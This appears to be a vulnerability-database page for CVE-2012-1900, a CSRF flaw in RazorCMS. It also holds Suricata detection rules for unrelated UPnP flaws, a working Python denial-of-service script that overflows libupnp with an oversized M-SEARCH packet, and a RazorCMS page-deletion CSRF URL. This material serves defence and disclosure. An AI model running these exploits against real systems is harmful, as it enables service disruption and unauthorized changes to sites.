CVE-2012-1900
published 2012-10-22CVE-2012-1900: Cross-site request forgery (CSRF) vulnerability in admin/index.php in RazorCMS 1.2.1 and earlier allows remote attackers to hijack the authentication of…
PriorityP335medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.63%
83.6th percentile
Cross-site request forgery (CSRF) vulnerability in admin/index.php in RazorCMS 1.2.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary web pages via a showcats action.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| razorcms | razorcms | <= 1.2.1 | — |
| razorcms | razorcms | — | — |
| razorcms | razorcms | — | — |
| razorcms | razorcms | — | — |
| razorcms | razorcms | — | — |
| razorcms | razorcms | — | — |
| razorcms | razorcms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M2
suricata·2013-01-30·CVSS 10.0
CVE-2012-5958 [CRITICAL] ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M2
ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M2
Rule: alert udp $HOME_NET 1900 -> any any (msg:"ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M2"; content:"Intel SDK for UPnP devices"; pcre:"/^Server\x3a[^\r\n]*Intel SDK for UPnP devices/mi"; reference:url,community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play; reference:url,upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v1.1.pdf; reference:cve,2012-5958; reference:cve,2012-5959; classtype:bad-unknown; sid:2016303; rev:5; metadata:created_at 2013_01_30, cve CVE_2012_5958, deployment Perimeter, confidence High, signature_severity Minor, updated_at 2023_05_02; target:src_ip;)
Suricata
ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M3
suricata·2013-01-30·CVSS 10.0
CVE-2012-5958 [CRITICAL] ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M3
ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M3
Rule: alert udp $HOME_NET 1900 -> any any (msg:"ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M3"; content:"Portable SDK for UPnP devices"; pcre:"/^Server\x3a[^\r\n]*Portable SDK for UPnP devices(\/?\s*$|\/1\.([0-5]\..|8\.0.|(6\.[0-9]|6\.1[0-7])))/m"; reference:url,community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play; reference:url,upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v1.1.pdf; reference:cve,2012-5958; reference:cve,2012-5959; classtype:bad-unknown; sid:2016304; rev:3; metadata:created_at 2013_01_30, cve CVE_2012_5958, deployment Perimeter, confidence High, signature_sev
Suricata
ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M1
suricata·2013-01-30·CVSS 10.0
CVE-2013-0229 [CRITICAL] ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M1
ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M1
Rule: alert udp $HOME_NET 1900 -> any any (msg:"ET INFO UPnP Discovery Search Response - CVE-2012-5958 and CVE-2012-5959 Vulnerable UPnP device M1"; content:"miniupnpd/1."; fast_pattern; pcre:"/^Server\x3a[^\r\n]*miniupnpd\/1\.[0-3]/mi"; reference:url,community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play; reference:url,upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v1.1.pdf; reference:cve,2013-0229; classtype:bad-unknown; sid:2016302; rev:7; metadata:created_at 2013_01_30, cve CVE_2013_0229, deployment Perimeter, confidence High, signature_severity Minor, updated_at 2023_05_02; target:src_ip;)
Exploit-DB
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
exploitdb·2020-11-27·CVSS 10.0
CVE-2012-5958 [CRITICAL] libupnp 1.6.18 - Stack-based buffer overflow (DoS)
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
---
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958
import socket
payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
Exploit-DB
RazorCMS 1.2.1 Stable - Cross-Site Request Forgery (Delete Web Pages)
exploitdb·2012-03-08
CVE-2012-1900 RazorCMS 1.2.1 Stable - Cross-Site Request Forgery (Delete Web Pages)
RazorCMS 1.2.1 Stable - Cross-Site Request Forgery (Delete Web Pages)
---
+------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : RazorCMS
CSRF Exploit to add ADMIN account
:80/razorcms/admin/?action=showcats&unpub=true&slabID=2&catname=sidebar">
In this POC I've deleted web page with ID=2
+------------------------------------------------------------------------------------------------------------------------------------+
No writeups or analysis indexed.
http://packetstormsecurity.org/files/110593/RazorCMS-1.2.1-STABLE-Cross-Site-Request-Forgery.htmlhttp://www.exploit-db.com/exploits/18575https://exchange.xforce.ibmcloud.com/vulnerabilities/73902http://packetstormsecurity.org/files/110593/RazorCMS-1.2.1-STABLE-Cross-Site-Request-Forgery.htmlhttp://www.exploit-db.com/exploits/18575https://exchange.xforce.ibmcloud.com/vulnerabilities/73902
2012-10-22
Published